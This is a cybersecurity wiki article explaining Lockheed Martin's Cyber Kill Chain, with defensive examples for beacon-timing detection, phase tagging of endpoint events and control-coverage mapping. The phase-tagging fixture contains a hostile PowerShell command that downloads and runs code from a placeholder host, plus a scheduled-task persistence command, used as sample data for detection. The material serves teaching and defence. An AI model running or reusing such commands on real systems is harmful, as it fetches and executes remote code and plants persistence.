# Kill Chain Model: Understanding Attack Progression
How Lockheed Martin's Cyber Kill Chain maps the stages of an intrusion, and how defenders can disrupt attacks at each phase.
The Cyber Kill Chain, published by Lockheed Martin analysts Hutchins, Cloppert, and Amin in 2011, is a structured framework that maps the sequential stages an adversary must complete to execute a successful intrusion. It exists because defenders needed a common operational vocabulary to describe, detect, and interrupt attacks before they reached their objectives. The core insight is simple but powerful: every targeted intrusion follows a predictable sequence of steps, and disrupting any one of those steps defeats that attempt and forces the adversary to start over, usually with new infrastructure or tooling. By understanding this progression, security teams shift from reactive incident response toward proactive defense, investing controls at the points where interruption is most cost-effective for the defender and most damaging to the attacker.
---
The Cyber Kill Chain is a seven-phase model that describes intrusion progression from initial reconnaissance through final data exfiltration or mission completion. The seven phases are: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control (C2), and Actions on Objectives. Each phase represents a discrete attacker activity, and each represents a corresponding defensive opportunity.
The Kill Chain is not a risk scoring system, a vulnerability database, or a compliance checklist. It is a causal model of attack behavior. Understanding this distinction matters because practitioners sometimes confuse it with MITRE ATT&CK, which catalogs specific adversary techniques at a granular level. The Kill Chain operates at a higher abstraction layer: it describes the "what happens and in what order," while ATT&CK describes the "how, specifically." The two frameworks are complementary, not competing.
The model also has notable variants. The Unified Kill Chain, developed by Paul Pols in 2017, extends the original seven phases to eighteen, incorporating post-exploitation activities and lateral movement in greater detail. The MITRE ATT&CK framework itself can be mapped onto Kill Chain phases but provides far more technical specificity. Some organizations adopt an internal hybrid, using Kill Chain phases as a detection classification scheme while mapping ATT&CK techniques beneath each phase.
The Kill Chain does not apply equally to all threat categories. It was designed with advanced persistent threats and targeted intrusions in mind. It is less descriptive for insider threats, where the attacker already has internal access and skips early phases entirely, and for opportunistic commodity attacks, where weaponization and delivery may be nearly simultaneous through automated exploit kits. Practitioners should account for these boundaries when building detection models around the framework.
---
The Kill Chain operates as a sequential model. An attacker must complete each phase to progress to the next, which means defenders have multiple independent opportunities to detect and interrupt the attack chain.
## Phase 1: Reconnaissance
The adversary collects information about the target before any offensive action. This includes open-source intelligence gathering (OSINT), scanning public IP ranges, scraping employee data from LinkedIn, reviewing job postings for technology stack clues, and identifying email formats. Target selection and pretext research for spear-phishing begin here. Defensive countermeasures include monitoring for unusual scanning activity against public-facing assets, limiting public disclosure of internal technology details in job postings, and conducting your own OSINT audits to understand what an attacker would see before they act.
## Phase 2: Weaponization
The attacker pairs a payload (malware, exploit code) with a delivery mechanism (a malicious document, a staged link). This phase happens entirely off-network from the defender's perspective, making it the hardest phase to directly detect. However, threat intelligence feeds that track attacker infrastructure and malware families provide indirect visibility. Malware analysis of previously seen samples can reveal weaponization patterns associated with specific threat actors.
## Phase 3: Delivery
The weapon is transmitted to the target environment. Common delivery vectors include phishing emails with malicious attachments, drive-by download sites, malicious USB media, and compromised third-party software updates (as seen in supply chain attacks). Defensive focus here includes email filtering, web proxies, endpoint protection, and user awareness training. This is one of the highest-return phases for defensive investment because many attacks can be stopped before any code executes.
## Phase 4: Exploitation
The delivered payload executes and exploits a vulnerability in software, configuration, or user behavior. This may involve a software vulnerability (a known CVE in an unpatched application), a zero-day, or simply a user opening a malicious document that runs a macro. Defenses include patch management, application allowlisting, disabling or restricting macro execution in Office documents by policy, and deploying endpoint detection and response (EDR) tools capable of detecting exploit behavior in memory.
## Phase 5: Installation
The attacker establishes persistence on the compromised system. This may involve dropping a remote access trojan (RAT), creating a scheduled task, modifying the registry for auto-run persistence, or installing a web shell on a compromised server. Detection here relies on monitoring for anomalous process creation, unauthorized changes to startup locations, and unexpected new files in system directories. EDR telemetry and a tuned SIEM are essential.
## Phase 6: Command and Control (C2)
The malware establishes an outbound communication channel to attacker-controlled infrastructure. This allows the adversary to issue commands, receive stolen data, and pivot further. C2 channels often use encrypted HTTPS traffic, domain generation algorithms (DGAs) to evade domain blocklisting, or DNS tunneling to blend into normal traffic. Defensive controls include DNS filtering, network traffic analysis for anomalous beacon patterns (connections at regular intervals, which stay detectable even when the implant adds a small random jitter), and egress filtering to block unexpected outbound connections.
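The beacon-timing analysis mentioned above, as an added example that is not part of the original page: it reads constructed Zeek-style conn.log lines and flags destination pairs whose connection intervals are too regular to be human, using the coefficient of variation of the inter-arrival times. The log contents, IP addresses, and thresholds are assumptions chosen for illustration.

```python
"""Periodicity-based C2 beacon detection over Zeek-style conn.log records.
Added example, not code from the original page; the log extract is constructed."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed conn.log extract (tab-separated: ts, id.orig_h, id.resp_h, id.resp_p).
# 10.0.0.5 beacons to 203.0.113.10:443 about every 60 s with a few seconds of jitter,
# and also browses 198.51.100.7:443 at irregular, bursty times.
_BEACON_JITTER = [0, 2, -1, 3, -2, 1, 0, -3, 2, 1, -1, 0]
_BROWSING_OFFSETS = [5, 9, 140, 141, 142, 300, 480, 481, 610, 660, 690, 700]


def constructed_conn_log(start_ts=1700000000.0):
    rows = []
    for i, jitter in enumerate(_BEACON_JITTER):
        rows.append((start_ts + 60 * i + jitter, "10.0.0.5", "203.0.113.10", 443))
    for off in _BROWSING_OFFSETS:
        rows.append((start_ts + off, "10.0.0.5", "198.51.100.7", 443))
    rows.sort()
    return "\n".join(f"{ts:.3f}\t{src}\t{dst}\t{port}" for ts, src, dst, port in rows)


def parse_conn_log(text):
    """Group connection timestamps by (src, dst, dst_port); skips Zeek '#' header lines."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port = line.split("\t")[:4]
        sessions[(src, dst, int(port))].append(float(ts))
    return sessions


def beacon_score(timestamps):
    """Return (mean_interval, coefficient_of_variation) for a series of timestamps.
    A fixed sleep gives near-constant intervals, so the CV stays low even with a small
    random jitter; interactive browsing produces bursts and gaps with a high CV."""
    stamps = sorted(timestamps)
    if len(stamps) < 2:
        return 0.0, float("inf")
    intervals = [b - a for a, b in zip(stamps, stamps[1:])]
    m = mean(intervals)
    return m, (pstdev(intervals) / m if m else float("inf"))


def find_beacons(text, min_connections=8, max_cv=0.2):
    """Flag (src, dst, port) tuples whose timing is regular enough to look scripted."""
    findings = {}
    for key, stamps in parse_conn_log(text).items():
        if len(stamps) < min_connections:
            continue
        period, cv = beacon_score(stamps)
        if cv <= max_cv:
            findings[key] = {"period_s": round(period, 1), "cv": round(cv, 3),
                             "connections": len(stamps)}
    return findings


if __name__ == "__main__":
    for (src, dst, port), s in find_beacons(constructed_conn_log()).items():
        print(f"possible beacon {src} -> {dst}:{port} every ~{s['period_s']}s "
              f"(cv={s['cv']}, n={s['connections']})")
```

The CV threshold and minimum connection count are the tuning knobs: long sleep intervals with large jitter push the CV up, so production detectors usually combine this with destination rarity and newly-registered-domain lookups rather than relying on timing alone.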
## Phase 7: Actions on Objectives
The attacker completes their mission: exfiltrating sensitive data, deploying ransomware, destroying data, establishing a persistent foothold for future operations, or pivoting to adjacent networks. This is the phase defenders most want to prevent, but if earlier phases were not interrupted, detection and response here is still possible. Data loss prevention (DLP) tools, user behavior analytics (UBA), and network segmentation all contribute to limiting impact at this stage.
## Concrete Scenario: Spear-Phishing to Ransomware
A threat actor targets a regional healthcare system. During Reconnaissance, they identify the CFO's email from a press release and confirm the organization uses Microsoft 365 from a job posting. During Weaponization, they craft a malicious Excel document with an embedded macro that downloads a Cobalt Strike beacon. During Delivery, the CFO receives a phishing email appearing to come from an auditing firm. During Exploitation, the CFO enables macros and the macro fetches and runs the beacon. During Installation, Cobalt Strike establishes persistence via a scheduled task. During C2, the beacon checks in to a domain registered three days prior. During Actions on Objectives, the actor deploys ransomware across file shares after spending two weeks in lateral movement. Each phase offered a defensive window: the phishing email could have been filtered, macro execution could have been blocked by policy, the scheduled task could have triggered an alert, the beacon pattern could have been flagged by DNS analytics. This is the operational value of the Kill Chain model: it reveals exactly where the defense failed and where it can be strengthened.
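One way to use the phases as a detection classification scheme, covering both the Installation-phase monitoring described above and this scenario (added example, not code from the original page or from CDA): constructed mail-gateway, Sysmon-style process and registry, and file-rename events are run through phase-tagged rules, and the output shows which phase would have fired first and how long the defender had before impact. Event shapes, paths, names, and thresholds are assumptions; the C2 phase is deliberately left to network telemetry, so it appears in the "no detection" list.

```python
"""Tag constructed endpoint and mail telemetry with Cyber Kill Chain phases.
Added example, not code from the original page; events are constructed to mirror the
spear-phishing-to-ransomware scenario and the rules are deliberately minimal."""
import ntpath
from collections import defaultdict

PHASES = ("Reconnaissance", "Weaponization", "Delivery", "Exploitation",
          "Installation", "Command and Control", "Actions on Objectives")
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MACRO_EXTENSIONS = {".xlsm", ".docm", ".pptm", ".xls", ".doc"}
AUTORUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")


def _name(path):
    return ntpath.basename(path).lower()


def rule_delivery(e):
    """External mail carrying a macro-capable attachment."""
    return (e["type"] == "email" and not e["internal_sender"]
            and ntpath.splitext(e["attachment"])[1].lower() in MACRO_EXTENSIONS)


def rule_exploitation(e):
    """An Office process spawning a script host: the malicious-macro lineage."""
    return (e["type"] == "process" and _name(e["parent"]) in OFFICE_APPS
            and _name(e["image"]) in SCRIPT_HOSTS)


def rule_installation(e):
    """Scheduled-task creation or an autorun registry write."""
    if e["type"] == "process":
        return _name(e["image"]) == "schtasks.exe" and "/create" in e["command_line"].lower()
    return e["type"] == "registry" and any(k in e["key"].lower() for k in AUTORUN_KEYS)


def rule_actions(events, window_s=60, threshold=20):
    """One process renaming many files to one new extension inside a short window."""
    by_proc = defaultdict(list)
    for e in events:
        if e["type"] == "file_rename":
            by_proc[(e["image"], ntpath.splitext(e["new_path"])[1].lower())].append(e["ts"])
    hits = []
    for (image, ext), stamps in by_proc.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                hits.append(("Actions on Objectives",
                             f"{_name(image)} renamed {threshold}+ files to {ext} in {window_s}s", ts))
                break
    return hits


def classify(events):
    """Return (phase, description, ts) findings in time order."""
    findings = []
    for e in events:
        if rule_delivery(e):
            findings.append(("Delivery", f"macro attachment {e['attachment']} from {e['sender']}", e["ts"]))
        if rule_exploitation(e):
            findings.append(("Exploitation", f"{_name(e['parent'])} spawned {_name(e['image'])}", e["ts"]))
        if rule_installation(e):
            findings.append(("Installation", e.get("command_line") or e.get("key"), e["ts"]))
    findings.extend(rule_actions(events))
    return sorted(findings, key=lambda f: f[2])


def time_to_impact(findings):
    """Seconds from the first detectable phase to the last: the defender's window."""
    return findings[-1][2] - findings[0][2] if findings else None


T0 = 1700000000
CONSTRUCTED_EVENTS = [
    {"ts": T0, "type": "email", "sender": "audit@auditors.example", "internal_sender": False,
     "attachment": "Q3_Audit_Request.xlsm"},
    {"ts": T0 + 120, "type": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/a'))"},
    {"ts": T0 + 125, "type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks /create /sc minute /mo 5 /tn OneDriveUpd /tr C:\Users\Public\svchost.exe"},
    {"ts": T0 + 126, "type": "registry",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpd"},
]
# Two weeks later: 25 renames to .locked within seconds on the finance share (ransomware).
CONSTRUCTED_EVENTS += [{"ts": T0 + 14 * 86400 + i, "type": "file_rename", "image": r"C:\Users\Public\svchost.exe",
                        "new_path": rf"\\fs01\finance\doc{i}.xlsx.locked"} for i in range(25)]
# Benign control: a user renaming three files by hand over an afternoon.
CONSTRUCTED_EVENTS += [{"ts": T0 + 7200 + 900 * i, "type": "file_rename", "image": r"C:\Windows\explorer.exe",
                        "new_path": rf"C:\Users\cfo\Desktop\old{i}.bak"} for i in range(3)]

if __name__ == "__main__":
    found = classify(CONSTRUCTED_EVENTS)
    for phase, desc, ts in found:
        print(f"+{ts - T0:>8}s  {phase:<22} {desc}")
    print("phases with no detection:", [p for p in PHASES if p not in {f[0] for f in found}])
```

Run stand-alone, the timeline shows Delivery firing at T0, Exploitation and two Installation findings within about two minutes, and the ransomware burst two weeks later; the two-week gap is the window the page describes, and the "no detection" list shows where host telemetry alone leaves Reconnaissance, Weaponization, and C2 uncovered.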
---
The Kill Chain matters because it converts abstract threat narratives into actionable defensive architecture. Without a model for attack progression, security teams tend to invest reactively, buying tools that address recent incidents rather than building layered defenses that address the full attack surface across all intrusion phases. The result is predictable: sophisticated attackers find the unmonitored phase and exploit it consistently.
Organizations without a Kill Chain-informed defensive posture frequently discover they have excellent email filtering (addressing Delivery) but no DNS monitoring (leaving C2 unchecked) and no network segmentation (making Actions on Objectives catastrophically effective). The Kill Chain exposes these coverage gaps structurally, not anecdotally.
A documented consequence: The 2013 Target data breach is one of the most cited examples of Kill Chain failure at multiple phases. Attackers gained initial access through a third-party HVAC vendor's credentials (Delivery and Exploitation), installed malware on point-of-sale systems (Installation), maintained C2 communication that generated alerts in Target's security tools (C2 phase alerts were observed but not acted upon), and exfiltrated over 40 million credit card records (Actions on Objectives). Post-breach analysis showed that the attack could have been stopped at the C2 phase: Target's FireEye system generated alerts that security staff did not escalate. A Kill Chain framework would have made the criticality of C2 detection explicit and established escalation protocols around it.
Common misconceptions to address: First, many practitioners assume the Kill Chain is linear and that attackers always proceed in strict sequence. Modern adversaries iterate, re-enter earlier phases, and run parallel operations. The model is a conceptual guide, not a rigid script. Second, some believe that stopping an attack at a late phase (such as Installation) represents a failure of defense. In practice, defense-in-depth means expecting that some attacks will penetrate early layers and ensuring late-phase detection is equally mature. Third, the Kill Chain does not imply that defenders must detect every phase in real time. Retrospective analysis of logs through the Kill Chain lens is equally valid and often reveals past intrusions that triggered no real-time alerts.
---
CDA approaches the Kill Chain model through the Planetary Defense Model (PDM) under the Risk Governance and Architecture (RGA) domain. In the RGA domain, the Kill Chain is not treated as a theoretical teaching tool but as a practical architecture guide for control placement, gap analysis, and continuous monitoring program design.
The Perpetual Compliance Assurance (PCA) methodology that CDA applies to client engagements is directly relevant here. Compliance is not an event. It is a state. For Kill Chain-informed programs, this means that control coverage across all seven phases must be continuously validated, not assessed once during an annual audit and assumed stable thereafter. Threat actor behavior evolves, new delivery vectors emerge, and C2 infrastructure rotates constantly. A control that was effective against a known threat actor's C2 infrastructure six months ago may be ineffective today if that actor has migrated to new domains or changed beacon intervals.
CDA's operational approach under PCA for Kill Chain alignment includes three specific practices that distinguish it from standard advisory engagements. First, CDA maps existing client controls to Kill Chain phases explicitly, producing a phase-by-phase coverage heatmap that shows where detection capability is strong, where it is absent, and where it depends on a single control with no redundancy. Second, CDA conducts Kill Chain simulation exercises (distinct from traditional penetration testing) that test defender detection and response at each individual phase rather than measuring only whether an attacker achieves final objectives. This reveals whether Phase 5 installation events trigger alerts, whether Phase 6 C2 beacons are flagged by DNS analytics, and whether Phase 7 data movement triggers DLP policies. Third, CDA integrates Kill Chain coverage metrics into the client's continuous compliance reporting, so that control degradation (a lapsed DNS filter subscription, an EDR agent gap on new endpoints) surfaces as a compliance variance, not merely a technical gap.
This approach operationalizes the Kill Chain rather than treating it as a one-time maturity assessment. For RGA domain clients, Kill Chain alignment becomes a measurable, auditable attribute of the organization's security posture rather than a framework that sits in a document and guides no operational decision.
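A minimal version of the phase-by-phase coverage heatmap and single-control check described in this section and in the coverage-gap discussion earlier on the page (added example, not CDA's tooling or code from the original page): each control is mapped to the phases it covers and carries the health its last automated check reported, and the report marks every phase as redundant, single-control, degraded-only, or a gap, so a lapsed subscription or an EDR agent gap surfaces as a variance against a named phase. The control inventory and health states are constructed.

```python
"""Kill Chain control-coverage heatmap with single-control and degradation flags.
Added example, not CDA's tooling; the control inventory below is constructed."""

PHASES = ("Reconnaissance", "Weaponization", "Delivery", "Exploitation",
          "Installation", "Command and Control", "Actions on Objectives")

# Constructed inventory: phases each control covers and the latest automated
# health-check result ("ok", "degraded" or "down").
CONSTRUCTED_CONTROLS = {
    "External attack surface monitoring": {"phases": {"Reconnaissance"}, "health": "ok"},
    "Secure email gateway": {"phases": {"Delivery"}, "health": "ok"},
    "Web proxy with URL filtering": {"phases": {"Delivery", "Command and Control"}, "health": "ok"},
    "Office macro block (GPO)": {"phases": {"Exploitation"}, "health": "ok"},
    "EDR agents": {"phases": {"Exploitation", "Installation", "Actions on Objectives"},
                   "health": "degraded", "note": "agent absent on 12% of endpoints"},
    "DNS filtering": {"phases": {"Command and Control"}, "health": "down",
                      "note": "subscription lapsed"},
}


def phase_coverage(controls):
    """Per phase: which controls are effective, degraded or down, plus an actionable status.
    'single-control' means one healthy control with no redundancy; 'degraded-only' means
    the phase is covered only by controls that are currently not fully effective."""
    tally = {p: {"ok": [], "degraded": [], "down": []} for p in PHASES}
    for name, c in controls.items():
        for p in c["phases"]:
            tally[p][c["health"]].append(name)
    report = {}
    for p, t in tally.items():
        if t["ok"]:
            status = "single-control" if len(t["ok"]) == 1 else "redundant"
        elif t["degraded"]:
            status = "degraded-only"
        else:
            status = "gap"
        report[p] = {"status": status, **{k: sorted(v) for k, v in t.items()}}
    return report


def variances(controls):
    """Controls whose health is not 'ok', with the phases they expose, for compliance reporting."""
    return [(name, c["health"], c.get("note", ""), sorted(c["phases"]))
            for name, c in controls.items() if c["health"] != "ok"]


if __name__ == "__main__":
    for phase, r in phase_coverage(CONSTRUCTED_CONTROLS).items():
        print(f"{phase:<22} {r['status']:<15} ok={r['ok']} degraded={r['degraded']} down={r['down']}")
    for name, health, note, phases in variances(CONSTRUCTED_CONTROLS):
        print(f"variance: {name} is {health} ({note}); exposes {phases}")
```

With this inventory, Weaponization shows as a gap (expected, since the page notes it is off-network), Command and Control collapses to a single control once DNS filtering lapses, and Installation and Actions on Objectives depend entirely on the degraded EDR deployment, which is exactly the single-control dependency the heatmap is meant to expose.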
---
Written by CDA Wiki Team